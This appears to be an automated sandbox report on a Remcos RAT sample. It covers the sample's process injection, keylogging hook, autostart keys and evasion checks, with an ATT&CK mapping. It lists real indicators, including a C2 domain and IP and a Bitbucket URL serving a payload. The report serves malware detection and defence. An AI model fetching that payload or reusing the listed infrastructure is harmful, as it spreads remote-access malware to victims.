                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtOpenFile: Direct from: 0x7FF8C88ED664Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtSetSecurityObject: Direct from: 0x7FF8C88F04D4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtSetTimerEx: Direct from: 0x7FF8C88F05D4Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtOpenKey: Direct from: 0x7FF8C88ED244Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtClose: Direct from: 0x7FF8C88ED1E4
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtCreateMutant: Direct from: 0x7FF8C88EE654Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtQueryVolumeInformationFile: Direct from: 0x7FF8C88ED924Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeNtMapViewOfSection: Direct from: 0x7FF8C88ED504Jump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4E40000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\yjfesx.exeMemory written: C:\Users\user\AppData\Local\Temp\yjfesx.exe base: D0000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4E40000Jump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4AA4008Jump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413910 ImpersonateSelf,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,GetLastError,RevertToSelf,0_2_00413910
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413910 ImpersonateSelf,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,GetLastError,RevertToSelf,0_2_00413910
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A33000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program ManagerE
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A2B000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000002.3992301442.0000000009A33000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: yjfesx.exe, 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000002.3992636781.0000000009A3B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: [2024/12/12 11:42:39 Program Manager]
                      Source: yjfesx.exe, 00000006.00000003.2775384504.0000000009A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program ManagerEM
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A2B000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000002.3992636781.0000000009A3B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: [2024/12/12 11:42:27 Program Manager]
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A33000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program ManagerN
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A33000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Managerr|
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A33000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Manager)
                      Source: yjfesx.exe, 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager]
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program ManagerU
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A33000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Managernet/
                      Source: yjfesx.exe, 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerns|
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A1A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
                      Source: yjfesx.exe, 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /12/12 11:42:27 Program Manager]
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A33000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Managernet/$
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A1A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Manager>
                      Source: yjfesx.exe, 00000006.00000002.3992301442.0000000009A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Program Managerz
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: GetLocaleInfoA,0_2_00432551
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: EnumSystemLocalesA,0_2_00430605
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: EnumSystemLocalesA,0_2_0043063C
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: EnumSystemLocalesA,0_2_004306C2
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,0_2_00430717
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,0_2_00422895
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0042B2AC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0042B2AC
                      Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004135C0 GetVersionExA,GetVersionExA,GetVersionExA,0_2_004135C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: yjfesx.exe PID: 5860, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: yjfesx.exe PID: 768, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5b30000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5aa0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5aa0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.yjfesx.exe.5b30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000006.00000002.3992191462.00000000099C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: yjfesx.exe PID: 5860, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: yjfesx.exe PID: 768, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      Abuse Elevation Control Mechanism                      		11
                      Disable or Modify Tools                      		11
                      Input Capture                      		1
                      System Time Discovery                      		Remote Services12
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts1
                      Native API                      		11
                      Scheduled Task/Job                      		1
                      DLL Side-Loading                      		11
                      Deobfuscate/Decode Files or Information                      		LSASS Memory1
                      File and Directory Discovery                      		Remote Desktop Protocol11
                      Input Capture                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts2
                      Command and Scripting Interpreter                      		11
                      Registry Run Keys / Startup Folder                      		1
                      Access Token Manipulation                      		1
                      Abuse Elevation Control Mechanism                      		Security Account Manager137
                      System Information Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts11
                      Scheduled Task/Job                      		Login Hook32
                      Process Injection                      		2
                      Obfuscated Files or Information                      		NTDS231
                      Security Software Discovery                      		Distributed Component Object ModelInput Capture2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
                      Scheduled Task/Job                      		3
                      Software Packing                      		LSA Secrets1
                      Process Discovery                      		SSHKeylogging13
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		Cached Domain Credentials251
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
                      Virtualization/Sandbox Evasion                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Access Token Manipulation                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron32
                      Process Injection                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573895 Sample: 3XSXmrEOw7.exe Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 26 newstaticfreepoint24.ddns-ip.net 2->26 28 s3-w.us-east-1.amazonaws.com 2->28 30 5 other IPs or domains 2->30 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 11 other signatures 2->46 7 3XSXmrEOw7.exe 1 3 2->7         started        11 yjfesx.exe 1 3 2->11         started        signatures3 process4 file5 20 C:\Users\user\Videos\...lectronArtsCLI.exe, PE32 7->20 dropped 48 Detected unpacking (creates a PE file in dynamic memory) 7->48 50 Creates multiple autostart registry keys 7->50 52 Writes to foreign memory regions 7->52 54 Allocates memory in foreign processes 7->54 13 csc.exe 16 3 7->13         started        22 C:\Users\user\...\HardDiskSentinelBin.exe, PE32 11->22 dropped 56 Drops large PE files 11->56 58 Injects a PE file into a foreign processes 11->58 18 yjfesx.exe 3 16 11->18         started        signatures6 process7 dnsIp8 32 newstaticfreepoint24.ddns-ip.net 181.131.217.244, 1842, 30203, 49729 EPMTelecomunicacionesSAESPCO Colombia 13->32 34 bitbucket.org 185.166.143.48, 443, 49736 AMAZON-02US Germany 13->34 36 s3-w.us-east-1.amazonaws.com 54.231.203.105, 443, 49743 AMAZON-02US United States 13->36 24 C:\Users\user\AppData\Local\Temp\yjfesx.exe, PE32 13->24 dropped 60 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 13->60 38 geoplugin.net 178.237.33.50, 49836, 80 ATOM86-ASATOM86NL Netherlands 18->38 62 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 18->62 64 Installs a global keyboard hook 18->64 66 Found direct / indirect Syscall (likely to bypass EDR) 18->66 file9 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      3XSXmrEOw7.exe29%ReversingLabsWin32.Ransomware.Generic
                      3XSXmrEOw7.exe100%AviraTR/Crypt.XPACK.Gen3

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.hdsentinel.com0%Avira URL Cloudsafe
                      http://go.microsoft.cC0%Avira URL Cloudsafe
                      https://bbuseruploads.s3.amazonaws0%Avira URL Cloudsafe
                      http://www.hdsentinel.comU0%Avira URL Cloudsafe
                      newstaticfreepoint24.ddns-ip.net0%Avira URL Cloudsafe
                      http://www.hdsentinel.com/sendreport.phpU0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      s3-w.us-east-1.amazonaws.com
                      		54.231.203.105
                      		truefalse
                        		high
                        bitbucket.org
                        		185.166.143.48
                        		truefalse
                          		high
                          navegacionseguracol24vip.org
                          		181.131.217.244
                          		truefalse
                            		high
                            geoplugin.net
                            		178.237.33.50
                            		truefalse
                              		high
                              newstaticfreepoint24.ddns-ip.net
                              		181.131.217.244
                              		truetrue
                                		unknown
                                bbuseruploads.s3.amazonaws.com
                                		unknown
                                		unknownfalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://geoplugin.net/json.gpfalse
                                    		high
                                    https://bitbucket.org/facturacioncol/fact/downloads/null.exefalse
                                      		high
                                      newstaticfreepoint24.ddns-ip.nettrue
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://bbuseruploads.s3.amazonaws.comcsc.exe, 00000003.00000002.3992663991.0000000006ECA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://geoplugin.net/$yjfesx.exe, 00000006.00000003.2775384504.0000000009A2B000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netcsc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://stackoverflow.com/q/14436606/23354csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.0000000006E11000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                              		high
                                              https://github.com/mgravell/protobuf-netJcsc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                		high
                                                http://geoplugin.net/json.gplyjfesx.exe, 00000006.00000002.3992301442.0000000009A1A000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://bitbucket.orgcsc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://geoplugin.net/json.gp0yjfesx.exe, 00000006.00000003.2775384504.0000000009A1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://web-security-reports.services.atlassian.com/csp-report/bb-websitecsc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://github.com/mgravell/protobuf-netcsc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.hdsentinel.comUcsc.exe, 00000003.00000003.2510018923.00000000085F0000.00000004.00000800.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000002.2829283806.00000000136AE000.00000004.00001000.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000000.2506800758.000000000051C000.00000020.00000001.01000000.00000008.sdmp, HardDiskSentinelBin.exe.5.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://go.microsoft.cCcsc.exe, 00000003.00000002.3991731167.0000000004F9F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.indyproject.org/HardDiskSentinelBin.exe.5.drfalse
                                                              		high
                                                              https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://geoplugin.net/json.gpzyjfesx.exe, 00000006.00000003.2775384504.0000000009A2B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netcsc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://dz8aopenkvv6s.cloudfront.netcsc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://geoplugin.net/json.gpSystem32yjfesx.exe, 00000006.00000002.3992301442.0000000009A13000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A04000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.hdsentinel.com/sendreport.phpUcsc.exe, 00000003.00000003.2510018923.00000000085F0000.00000004.00000800.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000002.2829283806.00000000136AE000.00000004.00001000.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000000.2506800758.000000000051C000.00000020.00000001.01000000.00000008.sdmp, HardDiskSentinelBin.exe.5.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://github.com/mgravell/protobuf-neticsc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          http://geoplugin.net/yjfesx.exe, 00000006.00000003.2775384504.0000000009A2B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://geoplugin.net/json.gp/Cyjfesx.exe, 00000005.00000002.2828685307.0000000005AA0000.00000004.00001000.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000002.2828832655.0000000005B30000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://remote-app-switcher.prod-east.frontend.public.atl-paas.netcsc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netcsc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://stackoverflow.com/q/11564914/23354;csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://stackoverflow.com/q/2152978/23354csc.exe, 00000003.00000003.2510018923.000000000828E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2510018923.00000000083C6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3994880865.00000000098E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://geoplugin.net/json.gpIyjfesx.exe, 00000006.00000002.3992301442.0000000009A1A000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://bbuseruploads.s3.amazonawscsc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://cdn.cookielaw.org/csc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://geoplugin.net/json.gpTyjfesx.exe, 00000006.00000002.3992301442.0000000009A1A000.00000004.00000001.00020000.00000000.sdmp, yjfesx.exe, 00000006.00000003.2775384504.0000000009A1A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://aui-cdn.atlassian.com/csc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://remote-app-switcher.stg-east.frontend.public.atl-paas.netcsc.exe, 00000003.00000002.3992663991.0000000006EC6000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000711E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713B000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-csc.exe, 00000003.00000002.3992663991.0000000006ECA000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.000000000713F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.microsoft.c3XSXmrEOw7.exefalse
                                                                                                      		high
                                                                                                      http://s3-w.us-east-1.amazonaws.comcsc.exe, 00000003.00000002.3992663991.000000000715F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecsc.exe, 00000003.00000002.3992663991.00000000071CB000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.0000000006E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://bitbucket.orgcsc.exe, 00000003.00000002.3992663991.000000000710D000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.3992663991.0000000006E11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://bbuseruploads.s3.amazonaws.comcsc.exe, 00000003.00000002.3992663991.000000000715F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.hdsentinel.comcsc.exe, 00000003.00000003.2510018923.00000000085F0000.00000004.00000800.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000002.2829283806.00000000136AE000.00000004.00001000.00020000.00000000.sdmp, yjfesx.exe, 00000005.00000000.2506800758.000000000051C000.00000020.00000001.01000000.00000008.sdmp, HardDiskSentinelBin.exe.5.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown

                                                                                                              World Map of Contacted IPs

                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs

                                                                                                              Public IPs

                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                              54.231.203.105
                                                                                                              		s3-w.us-east-1.amazonaws.comUnited States
                                                                                                              		16509AMAZON-02USfalse
                                                                                                              181.131.217.244
                                                                                                              		navegacionseguracol24vip.orgColombia
                                                                                                              		13489EPMTelecomunicacionesSAESPCOfalse
                                                                                                              185.166.143.48
                                                                                                              		bitbucket.orgGermany
                                                                                                              		16509AMAZON-02USfalse
                                                                                                              178.237.33.50
                                                                                                              		geoplugin.netNetherlands
                                                                                                              		8455ATOM86-ASATOM86NLfalse

                                                                                                              General Information

